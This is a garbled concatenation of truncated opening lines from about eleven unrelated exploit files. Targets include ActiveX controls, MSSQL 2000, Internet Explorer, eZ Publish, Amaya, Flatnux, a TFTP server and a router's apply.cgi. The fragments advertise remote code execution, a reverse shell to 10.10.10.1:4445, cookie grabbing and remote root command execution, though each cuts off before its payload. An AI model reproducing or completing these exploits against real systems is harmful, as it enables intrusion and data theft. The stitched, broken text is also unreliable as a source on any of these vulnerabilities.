####################### Phoenician Casino FlashAX ActiveX Remote Code Execution FTW! ######### ######By: e.wiZz! ######Blog: kidnap't by government .ba ######Business mail :) ew1zz@hotmail.com ######Info: you can erase my blog,arrest me,do whatever..
html % // k`sOSe 12/17/2008 // Microsoft SQL Server sp_replwritetovarbin() Heap Overflow // Tested on Win2k SP4 with MSSQL 2000(on one box only!). // Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), // the change al
!-- IE XML Heap Corruption exploit by krafty greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders. Bring back the days of technotronic and r00tshell! Freedom. poc:
?php /* eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected = 3.5.6 eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1 More info: http://ez.no/developer/securit
Amaya Web Browser html tag overflow (quite a few tags are vulnerable) (gdb) i r eax 0x41414141 1094795585 ecx 0x0 0 edx 0xbfc0ff80 -1077870720 ebx 0x9ec1220 166466080 esp 0xbfc10064 0xbfc10064 ebp 0xbfc10268 0xbfc10268 esi 0xa2f64a0 170878112 edi 0x
!-- exploit flatnux grabber cookies visitor site :http://www.speleoalex.altervista.org/flatnuke3/index.php download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download author:gmda Flatnux does not filter code html/javascript then
#!/usr/bin/python# This was written for educational purpose only. Use it at your own risk.# Author will be not responsible for any damage!# !!! Special greetz for my friend sinner_01 !!!# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#!/usr/bin/perl## ProSysInfo TFTP server TFTPDWIN = 0.4.2# Universal Remote Buffer Overflow Exploit# [Works on all Windows versions.]# ----------------------------------------# Exploit by SkD (skdrat@hotmail.com)## Let's take a description from thei
#!/usr/bin/perl # Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC # You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx # /JA # Come to FRHAC
// eZPublish_abuse_of_functionality_zero_day.php -------------------------------------------------------------- ?php /* eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.x * tested on version 3.9.0, 3.9.5,
html head meta http-equiv=content-type content=text/html; charset=ISO-8859-1 /head Remote root command execution /bin/sh form method=post action=http://192.168.1.1/apply.cgi id=1 input name=submit_button value=Ping type=hidden input name=action value